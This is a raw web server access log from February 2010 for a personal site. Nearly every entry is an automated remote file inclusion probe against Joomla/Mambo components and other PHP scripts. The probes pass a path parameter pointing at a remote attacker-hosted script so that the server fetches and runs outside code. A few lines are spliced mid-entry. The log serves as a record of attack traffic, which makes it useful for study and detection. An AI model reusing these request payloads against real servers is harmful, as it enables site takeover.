195.184.217.50 - - [02/Feb/2010:10:55:57 -0800] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://220.130.227.22//appserv/x?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:25:18 -0800] "GET /~t290/logs//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:25:18 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/t/t290/public_html/administrator93.174.121.139 - - [02/Feb/2010:11:25:18 -0800] "GET /~t290//administrator/components/com_moofaq/css/errors.php?error=http://
93.174.121.139 - - [02/Feb/2010:11:25:22 -0800] "GET /~t290//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:25:22 -0800] "GET /~t290/logs//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:25:25 -0800] "GET /~t290/logs/access.log//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 353 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
208.93.149.176 - - [02/Feb/2010:11:30:26 -0800] "GET /~t290/logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 13385 /home/users/t/t290/public_html/logs/ "-" "Advanced Browser (http://www.avantbrowser.com)" 0 web.hypersurf.com
208.93.149.176 - - [02/Feb/2010:11:30:26 -0800] "GET /~t290/logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tonefactory.fr/cmd?%0D?&u=x HTTP/1.1" 200 13385 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:22 -0800] "GET /~t290/logs/access.log%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:22 -0800] "GET /~t290/logs///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:23 -0800] "GET /~t290///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290/logs/access.log%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290/logs///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290/logs///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290/logs/access.log%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:31:29 -0800] "GET /~t290///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [02/Feb/2010:11:32:23 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [02/Feb/2010:11:32:23 -0800] "GET /~t290/logs/access.log.0//skin/zero_vote/error.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [02/Feb/2010:11:32:23 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:32:41 -0800] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:32:48 -0800] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
84.40.23.86 - - [02/Feb/2010:11:32:56 -0800] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_moofaq/css/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:33:09 -0800] "GET /~t290//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
93.174.121.139 - - [02/Feb/2010:11:33:09 -0800] "GET /~t290/logs//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/t/t290/public_html/logs/access.log93.174.121.139 - - [02/Feb/2010:11:33:09 -0800] "GET /~t290/logs/access.log//administrator/components/com_moofaq/css/errors.php?error=ht
93.174.121.139 - - [02/Feb/2010:11:36:00 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_moofaq/css/errors.php?error=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:37:56 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:37:56 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:37:56 -0800] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [02/Feb/2010:11:38:10 -0800] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
67.225.178.114 - - [02/Feb/2010:11:38:36 -0800] "GET /~t290/logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 13385 /home/users/t/t290/public_html/logs/ "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" 0 web.hypersurf.com
67.225.178.114 - - [02/Feb/2010:11:38:36 -0800] "GET /~t290/logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tonefactory.fr/cmd?%0D?&u=x HTTP/1.1" 200 13385 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" 0 web.hypersurf.com
67.195.115.185 - - [02/Feb/2010:11:39:11 -0800] "GET /~t290/logs/Jun02.html HTTP/1.0" 200 8761 /home/users/t/t290/public_html/logs/Jun02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:39:48 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:39:48 -0800] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [02/Feb/2010:11:39:48 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:41:23 -0800] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:41:23 -0800] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:41:27 -0800] "GET /~t290/logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:41:37 -0800] "GET /~t290/logs/access.log.0%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:43:05 -0800] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:43:05 -0800] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:43:10 -0800] "GET /~t290/logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
74.208.77.123 - - [02/Feb/2010:11:43:22 -0800] "GET /~t290/logs/access.log.0%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:33 -0800] "GET /~t290/logs///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs///booth.php "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:33 -0800] "GET /~t290///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 297 /home/users/t/t290/public_html/booth.php "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:33 -0800] "GET /~t290/logs/access.log.0///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:35 -0800] "GET /~t290/logs///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs///booth.php "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:35 -0800] "GET /~t290///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 297 /home/users/t/t290/public_html/booth.php "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:43:35 -0800] "GET /~t290/logs/access.log.0///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:11:44:18 -0800] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:11:44:18 -0800] "GET /~t290/logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:11:44:18 -0800] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:11:44:37 -0800] "GET /~t290/logs/access.log.0%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:46:58 -0800] "GET /~t290/logs/access.log.0%20%20///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.214.172.197 - - [02/Feb/2010:11:47:16 -0800] "GET /~t290/logs/access.log.0%20%20///booth.php?include_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:52:33 -0800] "GET /~t290/logs/access.log//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:52:33 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:52:34 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:52:54 -0800] "GET /~t290/logs/access.log.0//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.15.149.75 - - [02/Feb/2010:11:53:41 -0800] "GET /~t290/logs/access.log//login.php?dir=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.805" 0 web.hypersurf.com
72.15.149.75 - - [02/Feb/2010:11:53:41 -0800] "GET /~t290/logs//login.php?dir=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//login.php "-" "libwww-perl/5.805" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:56:13 -0800] "GET /~t290/logs/access.log//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:56:13 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:56:13 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
221.139.3.134 - - [02/Feb/2010:11:56:35 -0800] "GET /~t290/logs/access.log.0//skin/zero_vote/error.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
203.251.80.167 - - [02/Feb/2010:11:57:54 -0800] "GET /~t290//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkoktour.com/bbs/images/fx29id1.txt?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
203.251.80.167 - - [02/Feb/2010:11:57:54 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkoktour.com/bbs/images/fx29id1.txt?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
203.251.80.167 - - [02/Feb/2010:11:57:54 -0800] "GET /~t290/logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkoktour.com/bbs/images/fx29id1.txt?? HTTP/1.1" 404 353 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
203.251.80.167 - - [02/Feb/2010:11:58:40 -0800] "GET /~t290/logs/access.log.0//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkoktour.com/bbs/images/fx29id1.txt?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:12:01:49 -0800] "GET /~t290/logs/access.log.0//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.207.8.238 - - [02/Feb/2010:12:01:50 -0800] "GET /~t290/logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
208.93.149.176 - - [02/Feb/2010:12:05:49 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" 0 web.hypersurf.com
208.93.149.176 - - [02/Feb/2010:12:05:50 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.tonefactory.fr/cmd?%0D?&u=x HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" 0 web.hypersurf.com
81.3.150.104 - - [02/Feb/2010:12:06:29 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" 0 web.hypersurf.com
81.3.150.104 - - [02/Feb/2010:12:06:30 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.tonefactory.fr/cmd?%0D?&u=x HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" 0 web.hypersurf.com
67.195.115.185 - - [02/Feb/2010:12:09:46 -0800] "GET /~t290/logs/?D=D HTTP/1.0" 200 13352 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 web.hypersurf.com
67.195.115.185 - - [02/Feb/2010:12:10:13 -0800] "GET /~t290/logs/?S=A HTTP/1.0" 200 13352 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
81.3.150.104 - - [02/Feb/2010:12:18:46 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" 0 web.hypersurf.com
81.3.150.104 - - [02/Feb/2010:12:18:46 -0800] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.tonefactory.fr/cmd?%0D?&u=x HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" 0 web.hypersurf.com
67.227.222.29 - - [02/Feb/2010:12:37:11 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
67.227.222.29 - - [02/Feb/2010:12:37:11 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
67.227.222.29 - - [02/Feb/2010:12:37:11 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
